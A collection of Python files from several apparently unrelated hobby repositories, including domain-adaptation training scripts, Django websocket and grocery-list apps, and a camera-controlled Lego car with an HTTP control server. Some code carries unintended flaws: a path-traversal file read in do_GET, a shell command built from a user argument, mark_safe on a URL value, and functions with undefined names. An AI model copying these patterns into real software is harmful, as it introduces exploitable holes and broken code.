parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--gpu_id', default='0', type=str,
help='cuda device id')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log_interval', type=int, default=10,
help='how many batches to wait before logging training status')
parser.add_argument('--random', type=bool, default=False,
help='whether to use random')
parser.add_argument('--mdd_weight', type=float, default=0.05)
parser.add_argument('--entropic_weight', type=float, default=0)
parser.add_argument("--use_seed", type=bool, default=True)
args = parser.parse_args()
import random
if (args.use_seed):
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
import os.path as osp
import datetime
config = {}
config["output_path"] = "snapshot/" + args.task
config['seed'] = args.seed
config["torch_seed"] = torch.initial_seed()
config["torch_cuda_seed"] = torch.cuda.initial_seed()
config["mdd_weight"] = args.mdd_weight
config["entropic_weight"] = args.entropic_weight
if not osp.exists(config["output_path"]):
os.system('mkdir -p ' + config["output_path"])
config["out_file"] = open(osp.join(config["output_path"], "log_{}_{}.txt".
format(args.task, str(datetime.datetime.utcnow()))),
"w")
torch.manual_seed(args.seed)
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
if args.task == 'USPS2MNIST':
source_list = 'data/usps2mnist/usps_train.txt'
target_list = 'data/usps2mnist/mnist_train.txt'
test_list = 'data/usps2mnist/mnist_test.txt'
start_epoch = 1
decay_epoch = 6
elif args.task == 'MNIST2USPS':
source_list = 'data/usps2mnist/mnist_train.txt'
target_list = 'data/usps2mnist/usps_train.txt'
test_list = 'data/usps2mnist/usps_test.txt'
start_epoch = 1
decay_epoch = 5
else:
raise Exception('task cannot be recognized!')
train_loader = torch.utils.data.DataLoader(
ImageList(open(source_list).readlines(), transform=transforms.Compose([
transforms.Resize((28, 28)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='L'),
batch_size=args.batch_size, shuffle=True, num_workers=1, drop_last=True)
train_loader1 = torch.utils.data.DataLoader(
ImageList(open(target_list).readlines(), transform=transforms.Compose([
transforms.Resize((28, 28)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='L'),
batch_size=args.batch_size, shuffle=True, num_workers=1, drop_last=True)
test_loader = torch.utils.data.DataLoader(
ImageList(open(test_list).readlines(), transform=transforms.Compose([
transforms.Resize((28, 28)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='L'),
batch_size=args.test_batch_size, shuffle=True, num_workers=1)
model = network.LeNet()
model = model.cuda()
class_num = 10
if args.random:
random_layer = network.RandomLayer([model.output_num(), class_num], 500)
ad_net = network.AdversarialNetwork(500, 500)
random_layer.cuda()
else:
random_layer = None
ad_net = network.AdversarialNetwork(model.output_num() * class_num, 500)
ad_net = ad_net.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
optimizer_ad = optim.SGD(ad_net.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
config["out_file"].write(str(config) + "\n")
config["out_file"].flush()
for epoch in range(1, args.epochs + 1):
if epoch % decay_epoch == 0:
for param_group in optimizer.param_groups:
param_group["lr"] = param_group["lr"] * 0.5
train(args, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch,
start_epoch, args.method)
test(args, epoch, config, model, test_loader)
if __name__ == '__main__':
main()
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
import data.pre_process as prep
from torch.utils.data import DataLoader
from data.data_list import ImageList
def image_classification_test(loader, model, test_10crop=True):
start_test = True
with torch.no_grad():
if test_10crop:
iter_test = [iter(loader['test'][i]) for i in range(10)]
for i in range(len(loader['test'][0])):
data = [iter_test[j].next() for j in range(10)]
inputs = [data[j][0] for j in range(10)]
labels = data[0][1]
for j in range(10):
inputs[j] = inputs[j].cuda()
labels = labels
outputs = []
for j in range(10):
_, predict_out = model(inputs[j])
outputs.append(nn.Softmax(dim=1)(predict_out))
outputs = sum(outputs)
if start_test:
all_output = outputs.float().cpu()
all_label = labels.float()
start_test = False
else:
all_output = torch.cat((all_output, outputs.float().cpu()), 0)
all_label = torch.cat((all_label, labels.float()), 0)
else:
iter_test = iter(loader["test"])
for i in range(len(loader['test'])):
data = iter_test.next()
inputs = data[0]
labels = data[1]
inputs = inputs.cuda()
labels = labels.cuda()
_, outputs = model(inputs)
if start_test:
all_output = outputs.float().cpu()
all_label = labels.float()
start_test = False
else:
all_output = torch.cat((all_output, outputs.float().cpu()), 0)
all_label = torch.cat((all_label, labels.float()), 0)
_, predict = torch.max(all_output, 1)
accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])
return accuracy
prep_dict = {}
prep_config = {"test_10crop": True, 'params': {"resize_size": 256, "crop_size": 224, 'alexnet': False}}
prep_dict["target"] = prep.image_train(**prep_config['params'])
if prep_config["test_10crop"]:
prep_dict["test"] = prep.image_test_10crop(**prep_config['params'])
else:
prep_dict["test"] = prep.image_test(**prep_config['params'])
dsets = {}
dset_loaders = {}
model_path = "model/d2a_74.298.pth"
test_path = 'data/amazon_list.txt'
if prep_config["test_10crop"]:
for i in range(10):
dsets["test"] = [ImageList(open(test_path).readlines(), \
transform=prep_dict["test"][i]) for i in range(10)]
dset_loaders["test"] = [DataLoader(dset, batch_size=4, \
shuffle=False, num_workers=0) for dset in dsets['test']]
else:
dsets["test"] = ImageList(open(test_path).readlines(), \
transform=prep_dict["test"])
dset_loaders["test"] = DataLoader(dsets["test"], batch_size=4, \
shuffle=False, num_workers=0)
model = torch.load(model_path)
model.eval()
print(image_classification_test(dset_loaders,model))
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
from torchvision import transforms
from data.data_list import ImageList
def test(model, test_loader):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
feature, output = model(data)
test_loss += nn.CrossEntropyLoss()(output, target).item()
pred = output.data.cpu().max(1, keepdim=True)[1]
correct += pred.eq(target.data.cpu().view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
acc = 100. * correct / len(test_loader.dataset)
return acc
test_list = 'data/mnist_test.txt'
model = torch.load('model/s2m_94.84.pth')
test_loader = torch.utils.data.DataLoader(
ImageList(open(test_list).readlines(), transform=transforms.Compose([
transforms.Resize((32,32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
]), mode='RGB'),
batch_size=1000, shuffle=True, num_workers=1)
acc = test(model, test_loader)
print(acc)
|
[
"/loss.py",
"/train_image.py",
"/train_svhnmnist.py",
"/train_uspsmnist.py",
"/validate_d2a.py",
"/validate_s2m.py"
] |
02ChenBo/websocket
|
from channels.generic.websocket import WebsocketConsumer
import json
import threading
import time
cancel_tmr = False
class ChatConsumer(WebsocketConsumer):
# 连接上的方法
def connect(self):
self.accept()
self.heart_beat()
print('connect----')
# 断开连接时进入
def disconnect(self, close_code):
pass
print('disconnect----')
# 接收到消息的方法
def receive(self, text_data):
text_data_json = json.loads(text_data)
message = text_data_json['message']
self.send(text_data=json.dumps({
'message': message
}))
def heart_beat(self):
date = time.strftime('%Y-%m-%d %H:%M:%S')
# print(date)
self.send(text_data=json.dumps({
'message': date
}))
if not cancel_tmr:
threading.Timer(3, self.heart_beat).start()
--- FILE SEPARATOR ---
from django.conf.urls import url
from .views import Controller
urlpatterns = [
url(r'^$', Controller.index, name='index'),
url(r'^(?P<room_name>[^/]+)/$', Controller.room, name='room'),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
import datetime
from django.http import HttpResponse
# from dao.dbutils import mySql
from django.utils.safestring import mark_safe
import json
class Controller():
def index(request):
return render(request,'index.html',{});
def room(request, room_name):
return render(request, 'room.html', {
'room_name_json': mark_safe(json.dumps(room_name))
})
def hello(request):
s1 = 'Hello World!'
time = datetime.datetime.now()
html = '<html><head></head><body><h1> %s </h1><p> %s </p></body></html>' % (s1,time)
return HttpResponse(html);
# def login(request):
# str = 'SELECT VERSION()';
# version = mySql(str);
# ss = "Database version : %s " % version;
# s1 = 'Welcome!'
# html = '<html><head></head><body align=\'center\'><h1>' +s1+' </h1><p>数据库版本:'+ss+'</p></body></html>'
# return HttpResponse(html);
--- FILE SEPARATOR ---
from channels.routing import ProtocolTypeRouter,URLRouter
from channels.auth import AuthMiddlewareStack
import Hello.routing
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(
URLRouter(
Hello.routing.websocket_urlpatterns
)
),
})
--- FILE SEPARATOR ---
#import pymysql
#
# connect = pymysql.Connect(
# host='localhost',
# port=3306,
# user='root',
# passwd='',
# db='cloud_note',
# charset='utf8'
# )
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# import MySQLdb
# def mySql(ss):
# # 打开数据库连接
# db = MySQLdb.connect("localhost","root","","cloud_note")
#
# # 使用cursor()方法获取操作游标
# cursor = db.cursor()
#
# # 使用execute方法执行SQL语句
# cursor.execute(ss)
#
# # 使用 fetchone() 方法获取一条数据库。
# data = cursor.fetchone()
#
# #print ("Database version : %s " % data)
#
# # 关闭数据库连接
# db.close()
# return data;
#
# ss = "SELECT VERSION()";
# str = mySql(ss);
# print(str);
|
[
"/Hello/consumers.py",
"/Hello/urls.py",
"/Hello/views.py",
"/HelloDjango/routing.py",
"/dao/dbutils.py"
] |
02GAURAVTRIPATHI/GroceryBag
|
from django.contrib import admin
from .models import ListModel
# Register your models here.
admin.site.register(ListModel)
--- FILE SEPARATOR ---
# Generated by Django 3.1.3 on 2021-07-25 15:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('testapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='listmodel',
name='created_at',
field=models.DateTimeField(blank=True, null=True),
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _
# Create your models here.
class ListModel(models.Model):
user_id = models.ForeignKey(User, related_name="user_list", on_delete=models.CASCADE)
item_name = models.CharField(max_length=800)
quantity = models.CharField(max_length=300)
class Status(models.TextChoices):
BOUGHT = 'BOUGHT', _('item_bought')
NOT_AVAILABLE = 'NOT AVAILABLE', _('item_end')
PENDING = 'PENDING', _('in_queue')
action = models.CharField(max_length=20, choices=Status.choices)
created_at = models.DateTimeField(blank=True, null=True)
--- FILE SEPARATOR ---
from django.shortcuts import render
from .models import ListModel
from dateutil.parser import parse
# Create your views here.
def home_page_view(request):
#print(request.POST.dict().get('item'))
if request.method == "POST":
item = request.POST.dict()['item']
quantity = request.POST.dict()['quantity']
status = request.POST.dict()['status']
date = request.POST.dict()['date']
date = parse(date)
ListModel.objects.create(user_id=request.user, item_name=item, quantity=quantity, action=status, created_at=date)
return render(request, 'testapp/HTML/add.html')
def home1_page_view(request):
items = ListModel.objects.filter(user_id=request.user)
if request.method == "POST":
date = request.POST.dict().get('filter')
if date:
date = parse(date)
items = ListModel.objects.filter(user_id=request.user, created_at=date)
return render(request, 'testapp/HTML/index.html', {'items':items})
def home2_page_view(request,id):
if request.method == "POST":
item = request.POST.dict()['item']
quantity = request.POST.dict()['quantity']
status = request.POST.dict()['status']
date = request.POST.dict()['date']
date = parse(date)
ListModel.objects.filter(id=id).update(item_name=item, quantity=quantity, action=status, created_at=date)
item = ListModel.objects.get(id=id)
return render(request, 'testapp/HTML/update.html', {'item':item})
from django.shortcuts import redirect
from .forms import NewUserForm
from django.contrib.auth import login
from django.contrib import messages
def register_request(request):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
messages.success(request, "Registration successful." )
return redirect("/accounts/login")
messages.error(request, "Unsuccessful registration. Invalid information.")
form = NewUserForm()
return render (request=request, template_name="testapp/HTML/register.html", context={"register_form":form})
|
[
"/templateproject1/testapp/admin.py",
"/templateproject1/testapp/migrations/0002_listmodel_created_at.py",
"/templateproject1/testapp/models.py",
"/templateproject1/testapp/views.py"
] |
02alexander/autocar
|
#!/usr/bin/env python3
import numpy as np
import tensorflow as tf
import cv2
import os
import termios, sys
from tensorflow.keras.layers import Dense, Conv2D, Flatten
from recorder import Recorder
import argparse
from tensorflow.keras.utils import to_categorical
from trainer import proc_img, get_model
def train_single_output(x, y, x_test=None, y_test=None, epochs=300, reg=0.0):
model = tf.keras.Sequential([
tf.keras.layers.Dense(20,activation=tf.nn.sigmoid, kernel_regularizer=tf.keras.regularizers.l1(reg)),
tf.keras.layers.Dense(20,activation=tf.nn.sigmoid, kernel_regularizer=tf.keras.regularizers.l1(reg)),
tf.keras.layers.Dense(1,activation=tf.nn.relu)
])
model.compile(tf.keras.optimizers.Adam(),
loss=tf.keras.losses.MeanAbsoluteError(),
metrics=['mean_absolute_error'])
if x_test is not None and y_test is not None:
return (model, model.fit(x, y, epochs=epochs, validation_data=(x_test, y_test)))
else:
return (model, model.fit(x, y, epochs=epochs))
def train_models(x, y, epochs, regs):
models = []
for reg in regs:
(model,_) = train_single_output(x, y, epochs=epochs, reg=reg)
models.append(model)
return models
def train_15_outputs(model, x, y, x_test=None, y_test=None, reg=0.0, epochs=300):
model = tf.keras.Sequential([
tf.keras.layers.Dense(50, activation=tf.nn.sigmoid, kernel_regularizer=tf.keras.regularizers.l2(reg)),
tf.keras.layers.Dense(50, activation=tf.nn.sigmoid, kernel_regularizer=tf.keras.regularizers.l2(reg)),
tf.keras.layers.Dense(15, activation=tf.nn.sigmoid)
])
model.compile('adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
if x_test is not None and y_test is not None:
return model.fit(x, y, epochs=epochs, validation_data=(x_test, y_test))
else:
return model.fit(x, y, epochs=epochs)
def train_bounded_output(x, y):
model = tf.keras.Sequential([
tf.keras.layers.Dense(120, activation=tf.nn.sigmoid),
tf.keras.layers.Dense(50, activation=tf.nn.sigmoid),
tf.keras.layers.Dense(1, activation=tf.nn.relu)
])
model.compile('sgd',
loss=tf.keras.losses.MeanSquaredError(),
metrics=['accuracy'])
model.fit(x, y, batch_size=700, epochs=300)
return model
def feature_scaling(row):
min = np.min(row)
max = np.max(row)
return (row-min)/(max-min)
def train():
(x,y) = load_imgs("/home/alexander/data/autocar-round-5,6")
print(np.shape(x))
model = tf.keras.Sequential([
Conv2D(10, 3, 3, activation=tf.nn.sigmoid),
Flatten(),
Dense(50, activation=tf.nn.sigmoid),
Dense(15, activation=tf.nn.sigmoid)
])
model.compile('adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
def main():
#train()
parser = argparse.ArgumentParser(description='Controls a lego car autonomously.')
parser.add_argument('-r', '--record', help='The directory in which the replay is to be stored')
parser.add_argument('--show', help='Opens a windows that shows what the car sees', action='store_true')
parser.add_argument('model')
parser.add_argument('--linear', help='Needed if the model loaded is linear and it\'s weights are stored.', action='store_true')
args = parser.parse_args()
rec = None
if args.record is not None:
rec = Recorder(args.record)
fd = os.open("/dev/ttyACM0", os.O_WRONLY|os.O_SYNC)
cap = cv2.VideoCapture(0)
try:
model = tf.keras.models.load_model(args.model)
except:
model = get_model(linear=args.linear)
model.load_weights(args.model)
first_run = True
while True:
input_shape = model.layers[0].input_shape
rows = None
if input_shape[1] > 30:
rows = int(input_shape[1]/30)
else:
rows = input_shape[1]
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
proper = cv2.resize(gray, (30, 30))
vec = proc_img(proper, rows_removed=30-rows)
if rec is not None:
rec.store(vec.reshape(22,30)*255)
if args.show:
cv2.imshow('wind', vec.reshape(rows,30))
raw_prediction = None
if input_shape[1] > 30: # If the model expects a flattened out image. needed for backwards compatibility
raw_prediction = model.predict(vec.reshape(1,rows*30))
else:
m = np.array(vec)
raw_prediction = model.predict(m.reshape((1, rows, 30, 1)))
prediction = None
(_,c) = raw_prediction.shape
if c == 1:
prediction = np.round(raw_prediction, 0)
else:
prediction = np.argmax(raw_prediction,axis=1)[0]
prediction += 1
print(prediction)
if first_run:
os.write(fd, bytes(str(17)+"\x0a\x0d", 'ASCII'))
first_run=False
os.write(fd, bytes(str(prediction)+"\x0a\x0d", 'ASCII'))
cv2.waitKey(30)
if args.show:
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import termios
import os
class Car:
def __init__(self):
fd = os.open("/dev/ttyACM0", os.O_RDWR)
if fd == -1:
fd = os.open("/dev/ttyACM1", os.O_RDWR)
if fd == -1:
raise NameError("Error opening terminal device")
attr = termios.tcgetattr(fd)
attr[1] = attr[1] & ~(termios.OPOST | termios.ONLCR | termios.CBAUD)
attr[1] |= termios.B9600
termios.tcsetattr(fd, termios.TCSAFLUSH, attr)
self.is_on = False
self.position = 8
self.file = os.fdopen(fd, "w")
self.file.write("16\n")
def turn(self, new_pos):
self.file.write(str(new_pos)+"\n")
self.position = new_pos
def motor(self, on):
if on:
self.file.write("17\n")
self.is_on = True
else:
self.file.write("16\n")
self.is_on = False
--- FILE SEPARATOR ---
#!/usr/bin/env python3
from trainer import *
import matplotlib.pyplot as plt
import tensorflow as tf
epochs = [1200, 600, 400, 300]
rows_removed = 12
def experiment_classification():
for i in range(4):
directories = ['data/manual_round'+str(k) for k in range(1, i+2)]
imgs, positions = load_imgs(directories)
imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
(n, r, c) = np.shape(imgs)
imgs = np.reshape(imgs, (n, r, c, 1))
regs = [round(0.000001*(5**x), 7) for x in range(5)]
models = [ get_model(reg=reg) for reg in regs]
positions = to_categorical(positions, num_classes=15)
cbs = [
tf.keras.callbacks.ModelCheckpoint(
filepath='experiments/class'+str(i+1)+'/r'+str(reg)+"/check",
save_weights_only=True,
monitor='val_accuracy',
mode='max',
save_best_only=True) for reg in regs
]
hists = []
for (model, cb) in zip(iter(models),iter(cbs)):
hists.append(model.fit(imgs, positions, batch_size=50, epochs=epochs[i], validation_split=0.2, callbacks=[cb]))
for c in range(len(hists)):
hist = hists[c]
plt.ylabel('val_accuracy')
plt.xlabel('epochs')
plt.plot(hist.history['val_accuracy'])
plt.legend(['reg={}'.format(r) for r in regs])
plt.savefig('experiments/class'+str(i+1)+'/Figure_1.png')
plt.clf()
def experiment_linear():
for i in range(1):
directories = ['data/manual_round'+str(k) for k in range(1, i+2)]
imgs, positions = load_imgs(directories)
imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
(n, r, c) = np.shape(imgs)
imgs = np.reshape(imgs, (n, r, c, 1))
regs = [round(0.000001*(5**x), 7) for x in range(5)]
models = [ get_model(reg=reg, linear=True) for reg in regs]
cbs = [
tf.keras.callbacks.ModelCheckpoint(
filepath='experiments/linear'+str(i+1)+'/r'+str(reg)+"/check",
save_weights_only=True,
monitor='val_loss',
mode='min',
save_best_only=True) for reg in regs
]
hists = []
for (model, cb) in zip(iter(models),iter(cbs)):
hists.append(model.fit(imgs, positions, batch_size=50, epochs=epochs[i], validation_split=0.2, callbacks=[cb]))
for c in range(len(hists)):
hist = hists[c]
plt.ylabel('loss')
plt.xlabel('epochs')
plt.plot(hist.history['val_loss'])
plt.legend(['reg={}'.format(r) for r in regs])
plt.savefig('experiments/linear'+str(i+1)+'/Figure_1.png')
plt.clf()
if __name__ == "__main__":
#experiment_classification()
experiment_linear()
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import cv2
import os
import sys
class Recorder:
# directory is a string
def __init__(self, directory):
self.directory = directory
if self.directory[-1] != '/':
self.directory += '/'
self.cur_iter = self.get_cur_iter()
def get_cur_iter(self):
largest_iter = 0
for filename in os.listdir(self.directory):
digit = get_file_digit(filename)
if digit >= largest_iter:
largest_iter = digit
return largest_iter+1
def store(self, image, deg=None): # cv2 image
filename = self.directory
filename += str(self.cur_iter)
if deg is not None:
filename += "_"+str(deg)
filename += ".png"
cv2.imwrite(filename, image)
self.cur_iter += 1
def replay(self):
filenames = os.listdir(self.directory)
filenames.sort(key=get_file_digit)
i = 0
while i < len(filenames):
img = cv2.imread(self.directory+filenames[i])
cv2.imshow('recorder-replay', img)
print(filenames[i])
k = cv2.waitKey(0)
print(k)
if k == 108: # l
i = i-2
if k == 27: # escape
break
i = i+1
cv2.destroyWindow('recorder-replay')
def get_file_digit(filename):
if filename.find('_') is None:
dot_idx = filename.find('.')
return int(filename[0:dot_idx])
else:
idx = filename.find('_')
return int(filename[0:idx])
def main():
print(sys.argv[1])
rec = Recorder(sys.argv[1])
rec.replay()
if __name__ == '__main__':
main()
--- FILE SEPARATOR ---
#!/usr/bin/env python3
from trainer import *
from argparse import ArgumentParser
# kördes på ~/data/autocar-round-5 för att få de värden som i arbetet
if __name__ == "__main__":
parser = ArgumentParser('Finds the standard deviation from a model given the input images.')
parser.add_argument('-m', '--model', help='The model that is to be evaluated.')
parser.add_argument('directories', nargs='+', help='The directories in which the images are.')
parser.add_argument('--linear', action='store_true', help='Needed if the model to be evaluated is linear.')
args = parser.parse_args()
model = get_model(linear=args.linear)
try:
model = tf.keras.models.load_model(args.model)
except:
model = get_model(linear=args.linear)
model.load_weights(args.model)
imgs, positions = load_imgs(args.directories)
imgs = pre_proc(imgs, rows_removed=12, break_point=0.5)
(n, r, c) = np.shape(imgs)
imgs = np.reshape(imgs, (n, r, c, 1))
train_sd = np.std(positions)
if not args.linear:
positions = to_categorical(positions, num_classes=15)
preds = []
for i in range(n):
raw_prediction = model(imgs[i].reshape((1, 18, 30, 1)))
_,c = raw_prediction.shape
if c==1:
prediction = np.round(raw_prediction)
else:
prediction = np.argmax(raw_prediction)
preds.append(prediction)
preds = np.array(preds)
mean = np.mean(preds)
sd = np.std(preds)
print(train_sd)
print(mean)
print(sd)
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import os
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
"""
from flask import Flask
from flask import (
Blueprint, flash, g, redirect, render_template, request, session, url_for
)"""
from threading import Thread, Lock
import threading
from multiprocessing import Process, Pipe
import tensorflow as tf
import trainer
import numpy as np
import argparse
from recorder import Recorder
from car import Car
import cv2
lock = Lock()
deg = 8
motor_status = False
car = Car()
img_lock = Lock()
cur_img = None
def camera_reader():
global img_lock, cur_img
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
img_lock.acquire()
cur_img = frame
img_lock.release()
def autonomous_driver_server(conn, model_file_name=None, linear=False):
if model_file_name is None:
return
try:
model = tf.keras.models.load_model(model_file_name)
except:
model = trainer.get_model(linear=linear)
model.load_weights(model_file_name)
while True:
img = conn.recv()
if img is None:
conn.send(8)
continue
img = np.array(img)
input_shape = model.layers[0].input_shape
rows = input_shape[1]
processed_img = trainer.proc_img(img, rows_removed=30-rows, break_point=0.5)
m = np.array(processed_img)
raw_prediction = model.predict(m.reshape((1, rows, 30, 1)))
prediction = None
(_,c) = raw_prediction.shape
if c == 1:
prediction = np.round(raw_prediction, 0)
else:
prediction = np.argmax(raw_prediction,axis=1)[0]
prediction += 1
conn.send(prediction)
def car_controller(predictor_conn, alternating_autonomous=False, record_dir="replays/test"):
global img_lock, lock, car
# how many seconds it takes before it switches between being controlled by model and human.
seconds_between_switch = 1.0
# when it is controlled by the model it should not record any images.
# how often an image and degree is to be stored.
seconds_between_capture = 0.2
rec = Recorder(record_dir)
tlast_switch = time.time()
tlast_capture = time.time()
currently_autonomous = False
while True:
time.sleep(0.01)
if (time.time()-tlast_switch) > seconds_between_switch and alternating_autonomous:
tlast_switch = time.time()
currently_autonomous = not currently_autonomous
img_lock.acquire()
if cur_img is None:
img_lock.release()
print("continue")
continue
gray = cv2.cvtColor(cur_img, cv2.COLOR_BGR2GRAY)
img = cv2.resize(gray, (30,30))
img_lock.release()
lock.acquire()
local_motor_status = motor_status
if not currently_autonomous:
local_deg = deg
#print("human "+str(deg))
car.motor(motor_status)
local_motor_status = motor_status
else:
predictor_conn.send(img)
pred = predictor_conn.recv()
#print("predicted "+str(pred))
local_deg = pred
car.turn(local_deg)
if (time.time()-tlast_capture) > seconds_between_capture and local_motor_status:
tlast_capture = time.time()
rec.store(img, deg=local_deg)
if currently_autonomous:
print("auto "+str(local_deg))
else:
print("human "+str(local_deg))
lock.release()
class Server(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
path = self.path
path = path[1:]
if path == '' or path=='favicon.ico':
path = "index.html"
path = "templates/"+path
f = open(path, "r")
data = f.read()
self.wfile.write(bytes(data, "utf8"))
def do_POST(self):
global lock, deg, motor_status
#print()
#print(self.path)
content_length = int(self.headers['Content-Length'])
data = self.rfile.read(content_length)
print(data)
if data == b'0':
return
lock.acquire()
if self.path == '/servo':
f = float(data)
deg = round(f*14.0)+1
elif self.path == '/motor':
if data == b'false':
motor_status = False
else:
motor_status = True
lock.release()
def server_thread():
hostname = "0.0.0.0"
port = 5000
server = HTTPServer((hostname, port), Server)
print("Server started http://%s:%s" % (hostname, port))
try:
server.serve_forever()
except KeyboardInterrupt:
pass
server.server_close()
print("Server stopped.")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--dagger')
parser.add_argument('--savedir', '-d')
parser.add_argument('--linear', action='store_true')
args = parser.parse_args()
parent_conn, child_conn = Pipe()
predictor = Process(target=autonomous_driver_server, args=(child_conn, args.dagger,args.linear))
predictor.start()
s = Thread(target=server_thread)
s.start()
cr = Thread(target=camera_reader)
cr.start()
car_controller(parent_conn, alternating_autonomous=args.dagger, record_dir=args.savedir)
#controller = Thread(target=car_controller, args=(parent_conn,))
#controller.start()
#print(controller.ident)
#predictor.terminate()
#controller.join()
"""
def SERVER():
app = Flask(__name__)
@app.route('/')
def hello():
return render_template('index.html')
@app.route('/script.js')
def post():
return render_template('script.js')
@app.route('/servo', methods=['POST'])
def pos():
global deg, lock
f = float(request.data)
f = f*14.0
p = round(f)+1
print(p)
lock.acquire()
#car.turn(p)
deg = p
lock.release()
return ''
@app.route('/motor', methods=['POST'])
def motor():
global motor_status, lock
data = request.data
status = False
if data == b'false':
status = False
elif data == b'true':
status = True
lock.acquire()
#car.motor(status)
motor_status = status
lock.release()
return ''
app.run(host='0.0.0.0')
"""
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import tensorflow as tf
import pickle
import os
def preproc_files(srcdir, dstdir):
for file in os.listdir():
org_img = cv2.imread(srcdir+"/"+file_name)
org_label = get_servo_pos(file_name)
random_str = file_name[0:file_name.find("_")]
cv2.imwrite(dstdir+"/"+"preproc"+random_str+"_"+str(flipped_label)+".png", flipped_img)
def save_model_weights(model, fname):
pickle.dump(model.get_weights(), open(fname, "wb+"))
def load_model_weights(model, fname):
weights = pickle.load(open(fname, "rb"))
model.set_weights(weights)
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import numpy as np
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
from tensorflow.keras.regularizers import l2
import matplotlib.pyplot as plt
import os
import cv2
import test
import argparse
def main():
parser = argparse.ArgumentParser('trains, creates and evaluates models')
parser.add_argument('directories', nargs='+', help='the directores in which the training images are.')
parser.add_argument('--linear', action='store_true')
parser.add_argument('--dst')
parser.add_argument('--epochs', type=int, default=300)
args = parser.parse_args()
rows_removed = 12
(imgs, positions) = load_imgs(args.directories)
#(imgs, positions) = load_imgs('/home/alexander/data/autocar-round-5')
print(np.shape(positions))
print(np.shape(imgs))
imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
(n, r, c) = np.shape(imgs)
imgs = np.reshape(imgs, (n, r, c, 1))
regs = [round(0.000001*(5**x), 7) for x in range(5)]
models = [ get_model(reg=reg, linear=args.linear) for reg in regs]
if models[0].layers[-1].output_shape[1] != 1:
positions = to_categorical(positions, num_classes=15)
print(np.shape(positions))
print(positions)
fpath = args.dst
if fpath[-1] != '/':
fpath += '/'
cbs = [
tf.keras.callbacks.ModelCheckpoint(
filepath=fpath+'r'+str(reg)+"/check",
save_weights_only=True,
monitor='val_accuracy',
mode='max',
save_best_only=True) for reg in regs
]
hists = []
for (model, cb) in zip(iter(models),iter(cbs)):
hists.append(model.fit(imgs, positions, batch_size=50, epochs=args.epochs, validation_split=0.2, callbacks=[cb]))
for i in range(len(hists)):
hist = hists[i]
plt.ylabel('val_accuracy')
plt.xlabel('epochs')
plt.plot(hist.history['val_accuracy'])
plt.legend(['reg={}'.format(r) for r in regs])
plt.savefig(fpath+'Figure_1.png')
#test.save_model_weights(models[0], 'wtest')
"""(imgs, positions) = load_imgs('/home/alexander/data/autocar-round-5')
print(np.shape(positions))
print(np.shape(imgs))
imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
(n, r, c) = np.shape(imgs)
imgs = np.reshape(imgs, (n, r, c, 1))
positions = to_categorical(positions, num_classes=15)
#test.load_model_weights()
for model in models:
eval = model.evaluate(x=imgs, y=positions)
print(eval)
"""
#pred_y = models[0](imgs)
#m = get_model()
#test.load_model_weights(m, "wtest")
"""for model in models:
eval = m.evaluate(x=imgs, y=positions)
print(eval)
"""
#tf.keras.models.save_model(models[0], "models/lab/test.HD")
#models[0]
#for i in range(len(pred_y)):
# print(str(np.round(pred_y[i]))+" "+str(np.round(positions[i])))
#print(np.shape(imgs[0,:]))
#print(model.predict(imgs[0,:]))
#keras.models.save_model(model, 'models/conv10_20.HDF5')
def fit_models(models, x, y, prop_val, epochs=1000, batch_size=30):
n = np.shape(x)[0]
n_val = round(n*prop_val)
print("n_val="+str(n_val))
print("n="+str(n))
n_train = n-n_val
trainx = x[:n_train]
trainy = y[:n_train]
valx = x[n_train:]
valy = y[n_train:]
hists = []
for model in models:
hist = model.fit(trainx, trainy, validation_data=(valx, valy), batch_size=batch_size, epochs=epochs)
